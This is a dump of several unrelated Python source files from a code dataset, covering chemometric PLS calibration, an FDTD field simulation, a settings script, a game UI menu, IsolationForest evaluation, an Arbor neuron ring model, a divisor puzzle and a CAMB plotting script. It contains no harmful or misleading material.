amostra.replace(\"]\", \"\")\n db.execute(\"update amostra_calibracao set tpconjunto = 'CALIBRACAO' \"\n \" where idcalibracao =\" + str(idcalibracao) + \" and idmodelo = \" + str(idmodelo) +\n \" and idamostra = \" + str(int(float(amostra))))\n session.commit()\n\n # print(cont)\n cont = cont + 1\n session.commit()\n\n Xcal = self.selectMatrizX(idmodelo, \"CALIBRACAO\")\n Xval = self.selectMatrizX(idmodelo, \"VALIDACAO\")\n\n if executaPCA == 'S':\n Xcal = pca.testePCA(Xcal,qtdePC)\n Xval = pca.testePCA(Xval, qtdePC)\n\n qtde = 0\n if corteOutlier > 0:\n while qtde < qtdeRemocoes:\n self.detectarOutlierKNN(idmodelo, Xval, corteOutlier)\n self.detectarOutlierKNN(idmodelo, Xcal, corteOutlier)\n\n Xval = self.selectMatrizX(idmodelo, \"VALIDACAO\")\n Xcal = self.selectMatrizX(idmodelo, \"CALIBRACAO\")\n\n if executaPCA == 'S':\n Xcal = pca.testePCA(Xcal, qtdePC)\n Xval = pca.testePCA(Xval, qtdePC)\n\n qtde = qtde + 1\n\n Ycal = self.selectMatrizY(idmodelo, \"VALOR\", \"CALIBRACAO\")\n Yval = self.selectMatrizY(idmodelo, \"VALOR\", \"VALIDACAO\")\n\n YCodigoCal = self.selectMatrizY(idmodelo, \"ID\", \"CALIBRACAO\")\n YCodigoVal = self.selectMatrizY(idmodelo, \"ID\", \"VALIDACAO\")\n\n # Dados do Conjunto de Calibracao\n plsCal = PLSRegression(copy=True, max_iter=500, n_components=nrcomponentes, scale=False, tol=1e-06)\n plsCal.fit(Xcal, Ycal)\n coeficiente = plsCal.score(Xcal, Ycal, sample_weight=None)\n print('score do modelo PLS - Calibracao')\n print(coeficiente)\n print('R2 do modelo PLS - Calibracao')\n coeficienteCal = r2_score(plsCal.predict(Xcal), Ycal)\n print(coeficienteCal)\n\n # Dados do Conjunto de Validacao\n plsVal = PLSRegression(copy=True, max_iter=500, n_components=nrcomponentes, scale=False, tol=1e-06)\n plsVal.fit(Xval, Yval)\n coeficiente = plsVal.score(Xval, Yval, sample_weight=None)\n print('score do modelo PLS - Validacao')\n print(coeficiente)\n print('R2 do modelo PLS - Validacao')\n coeficienteVal = r2_score(plsVal.predict(Xval), Yval)\n print(coeficienteVal)\n # print('label_ranking_average_precision_score ')\n # print(label_ranking_average_precision_score(np.array(Yval), np.array(plsVal.y_scores_)))\n\n # Ajustar Calculos do RMSEC\n matYPredCalibracao = []\n\n for itemMatrizY in YCodigoCal:\n amostra = str(itemMatrizY)\n amostra = amostra.replace(\"[\", \"\")\n amostra = amostra.replace(\"]\", \"\")\n # print(i)\n linhaMatriz = []\n amostraPredicao = self.selectAmostra(int(float(amostra)), idmodelo)\n\n if executaPCA == 'S':\n amostraPredicao = pca.testePCA(amostraPredicao, qtdePC)\n\n Y_pred = plsCal.predict(amostraPredicao)\n # print(Y_pred)\n linhaMatriz.append(round(np.double(Y_pred), 0))\n matYPredCalibracao += [linhaMatriz]\n\n rmsec = sqrt(mean_squared_error(Ycal, matYPredCalibracao))\n print('RMSEC')\n print(rmsec)\n\n # Ajustar Calculos do RMSEP\n matYPredValidacao = []\n\n for itemMatrizY in YCodigoVal:\n amostra = str(itemMatrizY)\n amostra = amostra.replace(\"[\", \"\")\n amostra = amostra.replace(\"]\", \"\")\n # print(i)\n linhaMatriz = []\n amostraPredicao = self.selectAmostra(int(float(amostra)), idmodelo)\n\n if executaPCA == 'S':\n amostraPredicao = pca.testePCA(amostraPredicao, qtdePC)\n\n Y_pred = plsVal.predict(amostraPredicao)\n # print(Y_pred)\n linhaMatriz.append(round(np.double(Y_pred), 0))\n matYPredValidacao += [linhaMatriz]\n\n rmsep = sqrt(mean_squared_error(Yval, matYPredValidacao))\n print('RMSEP')\n print(rmsep)\n\n # Atualiza valores da calibracao\n db.execute(\"update calibracao set rmsec = \" + str(rmsec) +\n \" , inativo = 'A'\" +\n \" , rmsep = \" + str(rmsep) +\n \" , coeficientecal = \" + str(coeficienteCal) +\n \" , coeficienteval = \" + str(coeficienteVal) +\n \" , dtcalibracao = '\" + str(data_em_texto) + \"'\"\n \" where idmodelo = \" + str(idmodelo) +\n \" and idcalibracao = \" + str(idcalibracao) + \" \")\n session.commit()\n\n print(\"VARIAVEIS LATENTES\")\n print(nrcomponentes)\n\n return idmodelo\n\n\ndef kennardStone(X, k, precomputed=False):\n n = len(X) # number of samples\n # print(\"Input Size:\", n, \"Desired Size:\", k)\n now = datetime.now()\n print(\"Executando KennStonne\")\n print(now)\n assert n >= 2 and n >= k and k >= 2, \"Error: number of rows must >= 2, k must >= 2 and k must > number of rows\"\n\n # pair-wise distance matrix\n dist = metrics.pairwise_distances(X, metric='euclidean', n_jobs=-1)\n\n # get the first two samples\n i0, i1 = np.unravel_index(np.argmax(dist, axis=None), dist.shape)\n selected = set([i0, i1])\n k -= 2\n # iterate find the rest\n minj = i0\n while k > 0 and len(selected) < n:\n mindist = 0.0\n for j in range(n):\n if j not in selected:\n mindistj = min([dist[j][i] for i in selected])\n if mindistj > mindist:\n minj = j\n mindist = mindistj\n # print(selected, minj, [dist[minj][i] for i in selected])\n selected.add(np.int(minj))\n k -= 1\n # print(\"selected samples indices: \", selected)\n # return selected samples\n print(\"Terminou KennStonne\")\n now = datetime.now()\n print(now)\n return selected\n # if precomputed:\n # return list(selected)\n # else:\n # return X[list(selected), :]\n\n###EXECUTAVEL REMOVER SEMPRE\n#pls = PLS()\n#pls.predicao(4,101)\n# # PARAMETROS\n# # IDMODELO, NR_COMPONENTES (VARIAVEIS LATENTES), VALOR DE CORTE OUTLIER, QTDE DE REMOCOES, FAZ PCA S ou N, qtde PC\n#pls.calibracao(4, 20, 0.4, 4, 'N', 3)\n\n\n#Valor Utilizado Para a Qualificacao\n#pls.calibracao(3, 12, 0.9, 3)\n\nclass NumpyEncoder(json.JSONEncoder):\n \"\"\" Special json encoder for numpy types \"\"\"\n\n def default(self, obj):\n if isinstance(obj, (np.int_, np.intc, np.intp, np.int8,\n np.int16, np.int32, np.int64, np.uint8,\n np.uint16, np.uint32, np.uint64)):\n return int(obj)\n elif isinstance(obj, (np.float_, np.float16, np.float32,\n np.float64)):\n return float(obj)\n elif isinstance(obj, (np.ndarray,)): #### This is the fix\n return obj.tolist()\n return json.JSONEncoder.default(self, obj)\n\n\n'''\n\n\nprint('Erro absoluto mediano')\nprint(median_absolute_error(Y,matYPred))\n\nprint('Erro quadrático log Médio')\nprint(mean_squared_log_error(Y,matYPred))\n\nprint('coverage_error ')\nprint(coverage_error(np.array(Y),np.array(pls.y_scores_)))\n\nprint('label_ranking_average_precision_score ')\nprint(label_ranking_average_precision_score(np.array(Y),np.array(pls.y_scores_)))\n\nprint('label_ranking_loss')\nprint(label_ranking_loss(np.array(Y),np.array(pls.y_scores_)))\n\nprint('explained_variance_score')\nprint(explained_variance_score(Y,matYPred))\n\n\n'''\n\n\n","sub_path":"api-Regressao-chemo/metodos/pls.py","file_name":"pls.py","file_ext":"py","file_size_in_byte":25517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"51570687","text":"import numpy as np\r\nimport math as m\r\nimport matplotlib.pyplot as plt\r\n\r\nimp0 = 377.0\r\nsize = 1800\r\nepsilon = 5\r\n\r\nc = 1/np.sqrt(epsilon)\r\na = (c-1)/(c+1)\r\nb = 2/(c + 1)\r\n# Left boundary\r\nwl_nm1,wl_n,wl_np1 = 0,0,0 # Field at x=0 at time steps n-1, n, n+1\r\nwlp1_nm1,wlp1_n,wlp1_np1 = 0,0,0 # Field at x=1 at time steps n-1, n, n+1\r\n# Right boundary\r\nwr_nm1,wr_n,wr_np1 = 0,0,0 # Field at x=size at time steps n-1, n, n+1\r\nwrm1_nm1,wrm1_n,wrm1_np1 = 0,0,0 # Field at x=size-1 at time steps n-1, n, n+1\r\n\r\nsource_width = 45.0*np.sqrt(epsilon)\r\ndelay = 10*source_width\r\nsource_x = int(1.0*size/2.0)\r\n\r\ndef source(current_time, delay, source_width):\r\n return m.exp(-(current_time-delay)**2/(2.0 * source_width**2))\r\n\r\ntotal_steps = int(1*(size+delay)*np.sqrt(epsilon))\r\nframe_interval = int(total_steps/15.0)\r\nall_steps = np.linspace(0, size-1, size)\r\nez = np.zeros(size)\r\nhy = np.zeros(size)\r\nx = np.arange(0, size-1, 1)\r\n\r\nfor t in range(total_steps):\r\n hy[x] = hy[x] + (ez[x+1] - ez[x])/imp0\r\n wrm1_np1 = hy[-2]\r\n wr_np1 = -wrm1_nm1 + a*(wrm1_np1+wr_nm1) + b*(wr_n+wrm1_n)\r\n hy[-1] = wr_np1\r\n wr_nm1, wrm1_nm1 = wr_n, wrm1_n\r\n wr_n, wrm1_n = wr_np1, wrm1_np1\r\n ez[x+1] = ez[x+1] + (hy[x+1]-hy[x])*imp0/epsilon\r\n ez[source_x] += source(t, delay, source_width)\r\n #Evaluate Mur ABC value (eq. 6.35 Taflove)\r\n wlp1_np1 = ez[1]\r\n wl_np1 = -wlp1_nm1 + a*(wlp1_np1+wl_nm1) + b*(wl_n+wlp1_n)\r\n ez[0] = wl_np1\r\n #Cycle field values at boundary\r\n wl_nm1, wlp1_nm1 = wl_n, wlp1_n\r\n wl_n, wlp1_n = wl_np1, wlp1_np1\r\n if t % 100 == 0:\r\n plt.plot(all_steps , ez, all_steps, hy*imp0)\r\n plt.pause(0.00001)\r\n plt.clf()\r\n","sub_path":"step2.py","file_name":"step2.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"651402512","text":"import sys\nimport os.path\nfrom os import path\nimport pickle\n\nmyfile = os.path.expanduser('~/login_details.pkl')\n\nif os.path.isfile(myfile) == False:\n print(\"You must login for performing this action\")\n exit(0)\n\n# url = 'http://192.168.2.1:8000/login/'\n# d1url = \"http://127.0.0.1:8000/files/download/?name=usrs.BookIndex/bytes/filename/mimetype/a.txt\"\n# durl = \"http://127.0.0.1:8000/files/download/?name=usrs.BookIndex/bytes/filename/mimetype/Graph_and_Trees.pdf\"\n\n# client = requests.session()\n# client.get(url)\n# csrftoken1 = client.cookies['csrftoken']\n\n# with open(myfile, 'r') as fr:\n# count = 1\n# for line in fr:\n# if count == 1:\n# u = line[:-1]\n# elif count == 2:\n# p = line[:-1]\n# count+=1\n\n# print(u)\n# print(p)\n\n# login_data = dict(username=u, password=p, csrfmiddlewaretoken=csrftoken1)\n# r1 = client.post(url, data=login_data)\n# print(r1.url)\n\n\ntext_file = os.path.expanduser('~/encryption_scheme.pkl')\n\nif sys.argv[1]=='list':\n\tprint('1. AES')\n\tprint('2. RSA')\nelse:\n\tif len(sys.argv)==2 and sys.argv[1]=='update':\n\t\tprint('Do you want to update the data on the server?')\n\t\tans = input('Y/N')\n\t\tif ans == 'Y':\n\t\t\toldenc = os.path.expanduser('~/old_encryption_scheme.pkl')\n\t\t\twith open(oldenc,'wb') as fw:\n\t\t\t\twith open(text_file, 'rb') as fr:\n\t\t\t\t\tfor l in fr:\n\t\t\t\t\t\tpickle.dump(l,fw)\n\t\ta = input(\"Schema used: \")\n\t\tif a == 'AES':\n\t\t\tk = input(\"Key: \")\n\t\t\tpas = input(\"Passphrase: \")\n\t\t\twith open(text_file,'wb') as fw:\n\t\t\t\tpickle.dump(['AES',pas],fw)\n\t\telif a == 'RSA':\n\t\t\twith open(text_file,'wb') as fw:\n\t\t\t\tpickle.dump('RSA',fw)\n\t\telse:\n\t\t\tprint(\"Wrong Schema\")\n\t\t\tprint(\"Use 'spc en-de list' to view available choices\")\n\t\t\texit(0)\n\n\telse:\n\t\tfn = os.path.expanduser(sys.argv[2])\n\t\tif sys.argv[1]=='update':\n\t\t\tprint('Do you want to update the data on the server?')\n\t\t\tans = input('Y/N')\n\t\t\tif ans == 'Y':\n\t\t\t\toldenc = os.path.expanduser('~/old_encryption_scheme.pkl')\n\t\t\t\twith open(oldenc,'wb') as fw:\n\t\t\t\t\twith open(text_file, 'rb') as fr:\n\t\t\t\t\t\tfor l in fr:\n\t\t\t\t\t\t\tpickle.dump(l,fw)\n\t\t\twith open(f,'wb') as fw:\n\t\t\t\tpickle.dump('1',fw)\n\t\t\twith open(text_file,'wb') as fw:\n\t\t\t\twith open(fn, 'rb') as fr:\n\t\t\t\t\tfor l in fr:\n\t\t\t\t\t\tpickle.dump(l,fw)\n\t\telif sys.argv[1]=='dump':\n\t\t\twith open(fn, 'wb') as fw:\n\t\t\t\twith open(text_file,'rb') as fr:\n\t\t\t\t\tfor l in fr:\n\t\t\t\t\t\tpickle.dump(l,fw)","sub_path":"update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"463783669","text":"@classmethod\ndef __draw_control(cls):\n 距离 = 5\n # 输入系统(阶段)\n cls.draw_line()\n print(' ' * (cls.宽度 // 4 - 4) + \"选项:\\n\")\n if cls.键盘监听 == 'up' and cls.指针 > 0:\n cls.指针 -= 1\n cls.键盘监听 = None\n if cls.键盘监听 == 'down' and cls.指针 < len(cls.控制) - 1:\n cls.指针 += 1\n cls.键盘监听 = None\n 指针 = 0\n while 指针 < len(cls.控制):\n if 指针 == cls.指针:\n cls.printc(' ' * (cls.宽度 // 4 - 3 - 距离) + \">>\" + ' ' * 距离 + str(cls.color(cls.控制[指针])), 居中=False)\n else:\n cls.printc(' ' * (cls.宽度 // 4) + str(cls.color(cls.控制[指针])), 居中=False)\n 指针 += 1\n if cls.键盘监听 == 'enter' or cls.键盘监听 == 'space':\n cls.__control(cls.控制[cls.指针])\n # 记得改\n cls.键盘监听 = None\n\n\n@classmethod\ndef __control(cls, string):\n if string in (\"准备\",):\n 网络.发送(行为='准备', 对象=cls.控制[cls.指针])\n elif string == \"使用技能\":\n if 游戏.自己.回合: # 记得去 自己.回合 写 True,这是个布尔\n 网络.发送(行为='技能', 对象=游戏.自己.用户名)\n # 这里写技能什么乱七八糟的\n\n else:\n 网络.发送(行为=cls.控制[cls.指针], 对象=游戏.自己.用户名)\n","sub_path":"Client/client/UIControl.py","file_name":"UIControl.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"611080199","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Aug 1 14:25:53 2021\r\n\r\n@author: daniel pordeus\r\nLista 4 0 Random Forest\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon May 3 23:02:21 2021\r\n\r\n@author: danie\r\n\"\"\"\r\n#Importando as bibliotecas\r\nimport numpy as np\r\nfrom sklearn import metrics\r\nfrom sklearn.model_selection import KFold\r\nfrom sklearn.metrics import accuracy_score\r\n#from sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.ensemble import IsolationForest\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.metrics import plot_precision_recall_curve\r\n\r\n## funcoes úteis\r\n# Função para avaliar o desempenho dos algoritmos. Ele retorna a média das \r\n# métricas, acurácia no caso.\r\ndef avalia_classificador(clf, kf, X, y, f_metrica):\r\n metrica_val = []\r\n metrica_train = []\r\n for train, valid in kf.split(X,y):\r\n x_train = X[train]\r\n y_train = y[train]\r\n x_valid = X[valid]\r\n y_valid = y[valid]\r\n clf.fit(x_train, y_train)\r\n y_pred_val = clf.predict(x_valid)\r\n y_pred_train = clf.predict(x_train)\r\n metrica_val.append(f_metrica(y_valid, y_pred_val))\r\n metrica_train.append(f_metrica(y_train, y_pred_train))\r\n return np.array(metrica_val).mean(), np.array(metrica_train).mean()\r\n\r\n# Para simplificar a apresentação dos resultados e evitar repetição de código criamos a seguinte função auxuliar para imprimir os resultados.\r\ndef apresenta_metrica(nome_metrica, metrica_val, metrica_train, percentual = False):\r\n c = 100.0 if percentual else 1.0\r\n print('{} (validação): {}{}'.format(nome_metrica, metrica_val * c, '%' if percentual else ''))\r\n print('{} (treino): {}{}'.format(nome_metrica, metrica_train * c, '%' if percentual else ''))\r\n \r\ndef F1_score(revocacao, precisao):\r\n return 2*(revocacao*precisao)/(revocacao+precisao)\r\n\r\ndef novoAvaliaClassificador(y_original, y_previsto):\r\n falsoPositivo = 0\r\n verdadeiroPositivo = 0\r\n falsoNegativo = 0\r\n verdadeiroNegativo = 0\r\n for x in range(y_original.shape[0]):\r\n if y_original[x] == 0:\r\n if y_previsto[x] == 0:\r\n verdadeiroNegativo = verdadeiroNegativo + 1\r\n else:\r\n falsoNegativo = falsoNegativo + 1\r\n if y_original[x] == 1:\r\n if y_previsto[x] == 1:\r\n verdadeiroPositivo = verdadeiroPositivo + 1\r\n else:\r\n falsoPositivo = falsoPositivo + 1\r\n \r\n return falsoPositivo, verdadeiroPositivo, falsoNegativo, verdadeiroNegativo\r\n\r\ndef avalia_classificador_mais_metricas(clf, kf, X, y, f_metrica):\r\n metrica_val = []\r\n metrica_train = []\r\n precisao_val = []\r\n revocacao_val = []\r\n precisao_treino = []\r\n revocacao_treino = []\r\n \r\n for train, valid in kf.split(X,y):\r\n x_train = X[train]\r\n y_train = y[train]\r\n x_valid = X[valid]\r\n y_valid = y[valid]\r\n clf.fit(x_train, y_train)\r\n y_pred_val = clf.predict(x_valid)\r\n y_pred_train = clf.predict(x_train)\r\n metrica_val.append(f_metrica(y_valid, y_pred_val))\r\n FP_treino, VP_treino, FN_treino, VN_treino = novoAvaliaClassificador(y_train, y_pred_train)\r\n FP_val, VP_val, FN_val, VN_val = novoAvaliaClassificador(y_valid, y_pred_val)\r\n metrica_train.append(f_metrica(y_train, y_pred_train))\r\n precisao_treino.append(VP_treino / (VP_treino + FP_treino))\r\n revocacao_treino.append(VP_treino / (VP_treino + FN_treino))\r\n print(f\"Treino Precisao={formataSaida((VP_treino / (VP_treino + FP_treino)))} Revocacao={formataSaida(VP_treino / (VP_treino + FN_treino))}\")\r\n precisao_val.append(VP_val / (VP_val + FP_val))\r\n revocacao_val.append(VP_val / (VP_val + FN_val))\r\n print(f\"Validação Precisao={formataSaida(VP_val / (VP_val + FP_val))} Revocacao={formataSaida(VP_val / (VP_val + FN_val))}\")\r\n print(f\"F1-Score Treino = {F1_score((VP_treino / (VP_treino + FN_treino)), (VP_treino / (VP_treino + FP_treino)))}\")\r\n print(f\"F1-Score Validação = {F1_score((VP_val / (VP_val + FN_val)), (VP_val / (VP_val + FP_val)))}\")\r\n return np.array(metrica_val).mean(), np.array(metrica_train).mean(), np.array(precisao_treino).mean(), np.array(revocacao_treino).mean(), np.array(precisao_val).mean(), np.array(revocacao_val).mean()\r\n\r\ndef rodadaUnica(clf, X, y, f_metrica):\r\n clf.fit(X, y)\r\n y_pred_train = clf.predict(X)\r\n FP_treino, VP_treino, FN_treino, VN_treino = novoAvaliaClassificador(y, y_pred_train)\r\n metrica_train = (f_metrica(y, y_pred_train))\r\n precisao_treino = (VP_treino / (VP_treino + FP_treino))\r\n revocacao_treino = (VP_treino / (VP_treino + FN_treino))\r\n #print(f\"Precisao={formataSaida(precisao_treino)} Revocacao={formataSaida(revocacao_treino)}\")\r\n print(f\"F1-Score = {F1_score(precisao_treino, revocacao_treino)}\")\r\n return metrica_train, precisao_treino, revocacao_treino, y_pred_train\r\n\r\n\r\ndef formataSaida(valor):\r\n saidaFormatada = \"{:.2f}\".format(valor*100)\r\n return saidaFormatada + \"%\"\r\n\r\n## MAIN ##\r\ndataset = np.genfromtxt('E:\\\\Doutorado\\\\Aulas_Notas e Videos\\\\AA\\\\Listas\\\\Lista 4\\\\bostonbin.csv', delimiter=',', skip_header=1)\r\n#embaralhando entrada\r\nnp.random.shuffle(dataset)\r\n\r\n#divisao de conjuntos treinamento, testee e validacao\r\ntreino_size = int(np.floor((0.7 * len(dataset))))\r\n\r\ntreino_set = dataset[0:treino_size,:]\r\nteste_set = dataset[treino_size:,:]\r\n\r\ncoluna = dataset.shape[1] - 1\r\n#X\r\nX_treino = treino_set[:,:coluna]\r\nX_teste = teste_set[:,:coluna]\r\n\r\n#Y\r\nY_treino = treino_set[:,coluna]\r\nY_teste = teste_set[:,coluna]\r\n\r\n### Random Forest\r\n# Dividindo os dados em 10 folds.\r\nkf = KFold(n_splits=10, shuffle=True)\r\nbest = [0, 0] #acuracia, melhor max depth, melhor num estimadores\r\nn_classificadores = np.arange(10, 201, 10)\r\n#fpr = dict()\r\n#tpr = dict()\r\n#i = 0\r\nfor nclass in n_classificadores:\r\n rfc = IsolationForest(n_estimators=nclass)\r\n print(f\"### Estimadores={nclass} ###\")\r\n\r\n media_acuracia_val, media_acuracia_train, media_precisao_treino, media_revocacao_treino, media_precisao_val, media_revocacao_val = avalia_classificador_mais_metricas(rfc, kf, X_treino, Y_treino, accuracy_score)\r\n f1_score_treino = F1_score(media_revocacao_treino, media_precisao_treino)\r\n f1_score_validacao = F1_score(media_revocacao_val, media_precisao_val)\r\n apresenta_metrica('F1-Score', f1_score_validacao, f1_score_treino, percentual=False)\r\n \r\n #verifico o melhor pelo F1-Score Validacao\r\n if best[0] <= f1_score_validacao:\r\n best = [f1_score_validacao, nclass]\r\n print(\"#############################\") \r\nprint(f\"Melhor F1-Score de Validação: {best[0]}, Estimador={best[1]}\")\r\n\r\n# Rodada completa com melhor gamma e C\r\nprint(\"Rodada completa de Treinamento com melhor Max Depth e Estimadores\")\r\nrfc_treino_total = IsolationForest(n_estimators=best[1])\r\nmetrica, precisao, revocacao, y_pred_final = rodadaUnica(rfc_treino_total, X_treino, Y_treino, accuracy_score)\r\n\r\nprint(f\"Acurácia: {formataSaida(metrica)}\")\r\nprint(f\"Precisao: {formataSaida(precisao)}\")\r\nprint(f\"Revocacao: {formataSaida(revocacao)}\")\r\n\r\n# Teste\r\nprint(\"\")\r\nprint(\"Treino\")\r\nmetrica, precisao, revocacao, y_pred = rodadaUnica(rfc_treino_total, X_teste, Y_teste, accuracy_score)\r\nmetrics.plot_roc_curve(rfc_treino_total, X_teste, Y_teste)\r\ndisp = plot_precision_recall_curve(rfc_treino_total, X_teste, Y_teste)\r\ndisp.ax_.set_title('Precision-Recall Binária')\r\n\r\nprint(f\"Acurácia: {formataSaida(metrica)}\")\r\nprint(f\"Precisao: {formataSaida(precisao)}\")\r\nprint(f\"Revocacao: {formataSaida(revocacao)}\")\r\n\r\nplt.show() ","sub_path":"py_IsolationForest.py","file_name":"py_IsolationForest.py","file_ext":"py","file_size_in_byte":7603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"300810297","text":"import arbor\nimport pandas, seaborn\nfrom math import sqrt\n\n# Construct a cell with the following morphology.\n# The soma (at the root of the tree) is marked 's', and\n# the end of each branch i is marked 'bi'.\n#\n# b1\n# /\n# s----b0\n# \\\n# b2\n\ndef make_cable_cell(gid):\n # Associate labels to tags\n labels = arbor.label_dict()\n labels['soma'] = '(tag 1)'\n labels['dend'] = '(tag 3)'\n\n # Build a segment tree\n tree = arbor.segment_tree()\n\n # Soma (tag=1) with radius 6 μm, modelled as cylinder of length 2*radius\n s = tree.append(arbor.mnpos, arbor.mpoint(-12, 0, 0, 6), arbor.mpoint(0, 0, 0, 6), tag=1)\n\n # Single dendrite (tag=3) of length 100 μm and radius 2 μm attached to soma.\n b0 = tree.append(s, arbor.mpoint(0, 0, 0, 2), arbor.mpoint(100, 0, 0, 2), tag=3)\n\n # Attach two dendrites (tag=3) of length 50 μm to the end of the first dendrite.\n # Radius tapers from 2 to 0.5 μm over the length of the dendrite.\n b1 = tree.append(b0, arbor.mpoint(100, 0, 0, 2), arbor.mpoint(100+50/sqrt(2), 50/sqrt(2), 0, 0.5), tag=3)\n # Constant radius of 1 μm over the length of the dendrite.\n b2 = tree.append(b0, arbor.mpoint(100, 0, 0, 1), arbor.mpoint(100+50/sqrt(2), -50/sqrt(2), 0, 1), tag=3)\n\n # Mark location for synapse at the midpoint of branch 1 (the first dendrite).\n labels['synapse_site'] = '(location 1 0.5)'\n # Mark the root of the tree.\n labels['root'] = '(root)'\n\n cell = arbor.cable_cell(tree, labels)\n\n # Put hh dynamics on soma, and passive properties on the dendrites.\n cell.paint('\"soma\"', 'hh')\n cell.paint('\"dend\"', 'pas')\n # Attach a single synapse.\n cell.place('\"synapse_site\"', 'expsyn')\n # Attach a spike detector with threshold of -10 mV.\n cell.place('\"root\"', arbor.spike_detector(-10))\n\n return cell\n\nclass ring_recipe (arbor.recipe):\n\n def __init__(self, n=10):\n # The base C++ class constructor must be called first, to ensure that\n # all memory in the C++ class is initialized correctly.\n arbor.recipe.__init__(self)\n self.ncells = n\n\n # The num_cells method that returns the total number of cells in the model\n # must be implemented.\n def num_cells(self):\n return self.ncells\n\n # The cell_description method returns a cell\n def cell_description(self, gid):\n return make_cable_cell(gid)\n\n def num_targets(self, gid):\n return 1\n\n def num_sources(self, gid):\n return 1\n\n # The kind method returns the type of cell with gid.\n # Note: this must agree with the type returned by cell_description.\n def cell_kind(self, gid):\n return arbor.cell_kind.cable\n\n # Make a ring network\n def connections_on(self, gid):\n src = (gid-1)%self.ncells\n w = 0.01\n d = 5\n return [arbor.connection(arbor.cell_member(src,0), arbor.cell_member(gid,0), w, d)]\n\n # Attach a generator to the first cell in the ring.\n def event_generators(self, gid):\n if gid==0:\n sched = arbor.explicit_schedule([1])\n return [arbor.event_generator(arbor.cell_member(0,0), 0.1, sched)]\n return []\n\n def get_probes(self, gid):\n loc = arbor.location(0, 0) # at the soma\n return [arbor.cable_probe('voltage', loc)]\n\ncontext = arbor.context(threads=12, gpu_id=None)\nprint(context)\n\nmeters = arbor.meter_manager()\nmeters.start(context)\n\nncells = 4\nrecipe = ring_recipe(ncells)\nprint(f'{recipe}')\n\nmeters.checkpoint('recipe-create', context)\n\nhint = arbor.partition_hint()\nhint.prefer_gpu = True\nhint.gpu_group_size = 1000\nprint(f'{hint}')\n\nhints = dict([(arbor.cell_kind.cable, hint)])\ndecomp = arbor.partition_load_balance(recipe, context, hints)\nprint(f'{decomp}')\n\nmeters.checkpoint('load-balance', context)\n\nsim = arbor.simulation(recipe, decomp, context)\n\nmeters.checkpoint('simulation-init', context)\n\nspike_recorder = arbor.attach_spike_recorder(sim)\n\n# Attach a sampler to the voltage probe on cell 0.\n# Sample rate of 10 sample every ms.\nsamplers = [arbor.attach_sampler(sim, 0.1, arbor.cell_member(gid,0)) for gid in range(ncells)]\n\ntfinal=100\nsim.run(tfinal)\nprint(f'{sim} finished')\n\nmeters.checkpoint('simulation-run', context)\n\n# Print profiling information\nprint(f'{arbor.meter_report(meters, context)}')\n\n# Print spike times\nprint('spikes:')\nfor sp in spike_recorder.spikes:\n print(' ', sp)\n\n# Plot the recorded voltages over time.\nprint(\"Plotting results ...\")\ndf_list = []\nfor gid in range(ncells):\n times = [s.time for s in samplers[gid].samples(arbor.cell_member(gid,0))]\n volts = [s.value for s in samplers[gid].samples(arbor.cell_member(gid,0))]\n df_list.append(pandas.DataFrame({'t/ms': times, 'U/mV': volts, 'Cell': f\"cell {gid}\"}))\n\ndf = pandas.concat(df_list)\nseaborn.relplot(data=df, kind=\"line\", x=\"t/ms\", y=\"U/mV\",hue=\"Cell\").savefig('network_ring_result.svg')\n","sub_path":"python/example/network_ring.py","file_name":"network_ring.py","file_ext":"py","file_size_in_byte":4878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"247478507","text":"import math\n\n\ndef make_divisors(n):\n divisors = []\n for i in range(1, int(n**0.5)+1):\n if n % i == 0:\n divisors.append(i)\n if i != n // i:\n divisors.append(n//i)\n\n return divisors\n\n\nN, M = map(int, input().split())\ndivisors = make_divisors(M)\nans = 1\nfor d in divisors:\n if d*N <= M:\n ans = max(ans, d)\nprint(ans)\n","sub_path":"ABC_D/ABC112_D.py","file_name":"ABC112_D.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"385104769","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndo_lensing = True\nif do_lensing == True:\n\tdir = 'data_r_yeslensing/'\nelse:\n\tdir = 'data_r_nolensing/'\n\t\nfn = dir + 'test_r_0_scalCls.dat'\ncl = np.genfromtxt(fn, names = True)\n\nr = '0.056404616022847'\nr_num =0.056404616022847\nfn = dir + 'test_r_%s_scalCls.dat'%r\ncl_scal = np.genfromtxt(fn, names = True)\n\nfn = dir + 'test_r_%s_tensCls.dat'%r\ncl_tens = np.genfromtxt(fn, names = True)\n\nfn = dir + 'test_r_%s_totCls.dat'%r\ncl_tot = np.genfromtxt(fn, names = True)\n\nfn = dir + 'test_r_%s_lenspotentialCls.dat'%r\ncl_lenspotential = np.genfromtxt(fn, names = True)\n\nfn = dir + 'test_r_%s_lensedCls.dat'%r\ncl_lensed = np.genfromtxt(fn, names = True)\n\nfn = dir + 'test_r_%s_lensedtotCls.dat'%r\ncl_lensedtot = np.genfromtxt(fn, names = True)\n\nfn = dir + 'test_r_%s_tensCls.dat'%0.01\ncl_tens_0p01 = np.genfromtxt(fn, names = True)\n\nfig, ax = plt.subplots()\n\n#ax.loglog(cl['L'], cl['TT'], '-', label = 'TT,r=0')\n#ax.loglog(cl['L'], cl['TE'], '-', label = 'TE,r=0')\n#ax.loglog(cl['L'], cl['EE'], '-', label = 'EE,r=0')\n\n#ax.loglog(cl_scal['L'], cl_scal['TT'], '--', label = 'TT,r=%3.2f'%r_num)\n#ax.loglog(cl_scal['L'], cl_scal['TE'], '--', label = 'TE,r=%3.2f'%r_num)\n#ax.loglog(cl_scal['L'], cl_scal['EE'], '--', label = 